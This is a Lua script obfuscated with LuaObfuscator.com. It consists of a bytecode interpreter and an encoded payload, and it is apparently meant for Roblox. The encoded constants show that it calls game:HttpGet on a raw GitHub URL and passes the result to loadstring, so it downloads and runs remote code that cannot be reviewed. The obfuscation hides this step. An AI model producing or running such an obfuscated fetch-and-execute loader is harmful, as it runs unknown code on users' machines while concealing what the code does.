--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.9) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then local v82=0;while true do if (v82==0) then v19=v0(v3(v30,1,1));return "";end end else local v83=v2(v0(v30,16));if v19 then local v93=v5(v83,v19);v19=nil;return v93;else return v83;end end end);local function v20(v31,v32,v33) if v33 then local v84=0 -0 ;local v85;while true do if (v84==0) then v85=(v31/((5 -3)^(v32-(1 -0))))%((4 -2)^(((v33-1) -(v32-1)) + ((1497 -(282 + 595)) -(555 + 64)))) ;return v85-(v85%((2569 -(1523 + 114)) -(857 + 74))) ;end end else local v86=(570 -(367 + 201))^(v32-((834 + 94) -(214 + 713))) ;return (((v31%(v86 + v86))>=v86) and (1 + (0 -0))) or (0 + 0) ;end end local function v21() local v34=1065 -(16 + 52 + 997) ;local v35;while true do if (v34==(1271 -((1183 -(892 + 65)) + 1044))) then return v35;end if (v34==(0 -0)) then v35=v1(v16,v18,v18);v18=v18 + (118 -(32 + 85)) ;v34=1 + 0 ;end end end local function v22() local v36,v37=v1(v16,v18,v18 + (4 -2) );v18=v18 + (3 -1) ;return (v37 * (469 -213)) + v36 ;end local function v23() local v38,v39,v40,v41=v1(v16,v18,v18 + 3 );v18=v18 + (354 -(64 + 23 + (1045 -782))) ;return (v41 * (16777396 -(67 + 113))) + (v40 * (48056 + 17480)) + (v39 * (628 -372)) + v38 ;end local function v24() local v42=952 -(802 + 150) ;local v43;local v44;local v45;local v46;local v47;local v48;while true do if (v42==(1 + (0 -0))) then v45=2 -1 ;v46=(v20(v44,(4 -3) -0 ,450 -(44 + 386) ) * ((2 + 0)^(1029 -(915 + 82)))) + v43 ;v42=5 -3 ;end if (v42==(2 + 1)) then if (v47==(772 -(201 + 571))) then if (v46==(0 -(0 + 0))) then return v48 * (1187 -(1069 + 118)) ;else v47=1;v45=0 + 0 ;end elseif (v47==(7472 -5425)) then return ((v46==(0 -0)) and (v48 * (((3 -2) -0)/(0 + 0)))) or (v48 * NaN) ;end return v8(v48,v47-1023 ) * (v45 + (v46/(((769 -(745 + 21)) -1)^(19 + 33)))) ;end if (v42==0) then v43=v23();v44=v23();v42=1 + 0 ;end if (v42==(793 -(368 + 423))) then v47=v20(v44,65 -44 ,(1796 -(760 + 987)) -(10 + 8) );v48=((v20(v44,32)==(3 -2)) and  -((372 + 709) -(1020 + 60))) or (443 -((1144 -728) + 26)) ;v42=9 -6 ;end end end local function v25(v49) local v50;if  not v49 then v49=v23();if (v49==(0 -0)) then return "";end end v50=v3(v16,v18,(v18 + v49) -(1 + 0) );v18=v18 + v49 ;local v51={};for v66=1 + 0 , #v50 do v51[v66]=v2(v1(v3(v50,v66,v66)));end return v6(v51);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v52=(function() return 0;end)();local v53=(function() return;end)();local v54=(function() return;end)();local v55=(function() return;end)();local v56=(function() return;end)();local v57=(function() return;end)();local v58=(function() return;end)();local v59=(function() return;end)();while true do if (2~=v52) then else local v90=(function() return 1926 -(1235 + 691) ;end)();local v91=(function() return;end)();while true do if (v90~=0) then else v91=(function() return 1835 -(274 + 1561) ;end)();while true do if (v91==(0 -0)) then v59=(function() return {};end)();for v149= #"[",v58 do local v150=(function() return 0 + 0 ;end)();local v151=(function() return;end)();local v152=(function() return;end)();local v153=(function() return;end)();while true do if (v150==0) then local v166=(function() return 241 -(187 + 54) ;end)();while true do if (v166~=(781 -(162 + 618))) then else v150=(function() return 1 + 0 ;end)();break;end if (v166==0) then v151=(function() return 0 + 0 ;end)();v152=(function() return nil;end)();v166=(function() return 1 -0 ;end)();end end end if (v150~=(1 -0)) then else v153=(function() return nil;end)();while true do if (v151~=1) then else if (v152== #"{") then v153=(function() return v21()~=0 ;end)();elseif (v152==(1 + 1)) then v153=(function() return v24();end)();elseif (v152== #"19(") then v153=(function() return v25();end)();end v59[v149]=(function() return v153;end)();break;end if (v151==0) then v152=(function() return v21();end)();v153=(function() return nil;end)();v151=(function() return 1;end)();end end break;end end end v91=(function() return 1637 -(1373 + 263) ;end)();end if (v91==1) then v57[ #"xxx"]=(function() return v21();end)();v52=(function() return 1003 -(451 + 549) ;end)();break;end end break;end end end if (v52==(1 + 2)) then for v94= #":",v23() do local v95=(function() return v21();end)();if (v20(v95, #"}", #">")==0) then local v101=(function() return 0 -0 ;end)();local v102=(function() return;end)();local v103=(function() return;end)();local v104=(function() return;end)();while true do if (v101==(0 -0)) then local v142=(function() return 0;end)();while true do if (v142==1) then v101=(function() return 1385 -(746 + 638) ;end)();break;end if (v142==0) then v102=(function() return v20(v95,1 + 1 , #"asd");end)();v103=(function() return v20(v95, #"?id=",8 -2 );end)();v142=(function() return 342 -(218 + 123) ;end)();end end end if (v101==(1582 -(1535 + 46))) then v104=(function() return {v22(),v22(),nil,nil};end)();if (v102==(0 + 0)) then local v159=(function() return 0;end)();local v160=(function() return;end)();while true do if (v159==(0 + 0)) then v160=(function() return 560 -(306 + 254) ;end)();while true do if (v160~=0) then else v104[ #"19("]=(function() return v22();end)();v104[ #".dev"]=(function() return v22();end)();break;end end break;end end elseif (v102== #"~") then v104[ #"19("]=(function() return v23();end)();elseif (v102==(1 + 1)) then v104[ #"nil"]=(function() return v23() -(2^16) ;end)();elseif (v102~= #"-19") then else local v173=(function() return 0 -0 ;end)();local v174=(function() return;end)();while true do if (v173==(1467 -(899 + 568))) then v174=(function() return 0 + 0 ;end)();while true do if (v174==(0 -0)) then v104[ #"-19"]=(function() return v23() -((605 -(268 + 335))^(306 -(60 + 230))) ;end)();v104[ #".com"]=(function() return v22();end)();break;end end break;end end end v101=(function() return 2;end)();end if (v101==2) then if (v20(v103, #" ", #">")== #"[") then v104[2]=(function() return v59[v104[2]];end)();end if (v20(v103,2,2)~= #"[") then else v104[ #"19("]=(function() return v59[v104[ #"nil"]];end)();end v101=(function() return 575 -(426 + 146) ;end)();end if (v101==3) then if (v20(v103, #"-19", #"xnx")~= #"\\") then else v104[ #"asd1"]=(function() return v59[v104[ #".dev"]];end)();end v54[v94]=(function() return v104;end)();break;end end end end for v96= #"[",v23() do v55,v96,v28=(function() return v53(v55,v96,v28);end)();end return v57;end if ((1 + 0)==v52) then v56=(function() return {};end)();v57=(function() return {v54,v55,nil,v56};end)();v58=(function() return v23();end)();v52=(function() return 2;end)();end if (v52~=0) then else local v92=(function() return 811 -(569 + 242) ;end)();while true do if (v92~=(2 -1)) then else v55=(function() return {};end)();v52=(function() return 1 + 0 ;end)();break;end if (v92==(1024 -(706 + 318))) then v53=(function() return function(v105,v106,v107) local v108=(function() return 0;end)();local v109=(function() return;end)();while true do if (v108==0) then v109=(function() return 0;end)();while true do if (v109==(1251 -(721 + 530))) then local v168=(function() return 0;end)();while true do if ((1271 -(945 + 326))==v168) then v105[v106-#":" ]=(function() return v107();end)();return v105,v106,v107;end end end end break;end end end;end)();v54=(function() return {};end)();v92=(function() return 1;end)();end end end end end local function v29(v60,v61,v62) local v63=v60[2 -1 ];local v64=v60[2];local v65=v60[3 + 0 ];return function(...) local v68=v63;local v69=v64;local v70=v65;local v71=v27;local v72=701 -(271 + 429) ;local v73= -(1 + 0);local v74={};local v75={...};local v76=v12("#",...) -(851 -(20 + 830)) ;local v77={};local v78={};for v87=0 + 0 ,v76 do if (v87>=v70) then v74[v87-v70 ]=v75[v87 + (1501 -(1408 + 92)) ];else v78[v87]=v75[v87 + (1087 -(461 + 625)) ];end end local v79=(v76-v70) + ((2793 -(363 + 1141)) -((2573 -(1183 + 397)) + 295)) ;local v80;local v81;while true do v80=v68[v72];v81=v80[1 + 0 ];if ((v81<=(1174 -(418 + 753))) or (2318>=4800)) then if (((647<=3287) and (v81<=((2 -1) + 0))) or (142>=4749)) then if (v81>(0 + 0)) then local v110=v80[1 + 0 + 1 ];v78[v110]=v78[v110](v13(v78,v110 + 1 + 0 + 0 ,v73));else local v112;local v113,v114;local v115;local v116;v78[v80[(2506 -(1913 + 62)) -(406 + 123) ]]={};v72=v72 + ((1115 + 655) -(1749 + 20)) ;v80=v68[v72];v78[v80[1 + (2 -1) ]]=v62[v80[7 -4 ]];v72=v72 + (1934 -(565 + 1368)) ;v80=v68[v72];v78[v80[1324 -(1249 + (274 -201)) ]]=v62[v80[2 + 1 ]];v72=v72 + (1146 -((2127 -(1477 + 184)) + 679)) ;v80=v68[v72];v116=v80[2];v115=v78[v80[1124 -(118 + (1365 -362)) ]];v78[v116 + (2 -1) ]=v115;v78[v116]=v115[v80[11 -7 ]];v72=v72 + (1901 -(99 + 7 + 1794)) ;v80=v68[v72];v78[v80[1 + 1 ]]=v80[1 + 2 ];v72=v72 + (2 -1) ;v80=v68[v72];v116=v80[5 -3 ];v113,v114=v71(v78[v116](v13(v78,v116 + (857 -(564 + 292)) + 0 ,v80[117 -(4 + 110) ])));v73=(v114 + v116) -(585 -(57 + 527)) ;v112=1427 -(41 + 1386) ;for v144=v116,v73 do v112=v112 + (104 -((29 -12) + 86)) ;v78[v144]=v113[v112];end v72=v72 + 1 + 0 ;v80=v68[v72];v116=v80[3 -1 ];v78[v116]=v78[v116](v13(v78,v116 + ((5 -3) -1) ,v73));v72=v72 + (167 -(122 + 44)) ;v80=v68[v72];v78[v80[2 -0 ]]();v72=v72 + ((307 -(244 + 60)) -2) ;v80=v68[v72];do return;end end elseif ((3926<=4134) and (v81>((581 + 174) -(239 + 514)))) then v78[v80[2 + (476 -(41 + 435)) ]]={};else local v133=v80[(1002 -(938 + 63)) + 1 ];local v134,v135=v71(v78[v133](v13(v78,v133 + (1 -0) ,v80[68 -(30 + 35) ])));v73=(v135 + v133) -1 ;local v136=0 + 0 ;for v147=v133,v73 do local v148=1202 -(373 + 829) ;while true do if (v148==(731 -(476 + 255))) then v136=v136 + ((968 + 290) -(1043 + (1339 -(936 + 189)))) ;v78[v147]=v134[v136];break;end end end end elseif (v81<=(18 -13)) then if ((v81>((401 + 815) -(323 + 889))) or (164>=2785)) then v78[v80[2 -(1613 -(1565 + 48)) ]]=v62[v80[7 -4 ]];else v78[v80[582 -(361 + 219) ]]=v80[323 -(53 + 267) ];end elseif (v81<=(2 + 4)) then v78[v80[(257 + 158) -(15 + 398) ]]();elseif (v81==(10 -3)) then local v154=v80[338 -(144 + 192) ];local v155=v78[v80[219 -(42 + 174) ]];v78[v154 + 1 + 0 ]=v155;v78[v154]=v155[v80[986 -(18 + 964) ]];else do return;end end v72=v72 + 1 ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403603Q00682Q7470733A2Q2F7261772E67697468756275736572636F6E74656E742E636F6D2F74616D647A3132332D636F64652F69646B2F726566732F68656164732F6D61696E2F5363726970742532306D254531252Q422539426925323074616D647A00099Q003Q00122Q000100013Q00122Q000200023Q00202Q00020002000300122Q000400046Q000200046Q00013Q00024Q0001000100016Q00017Q00",v9(),...);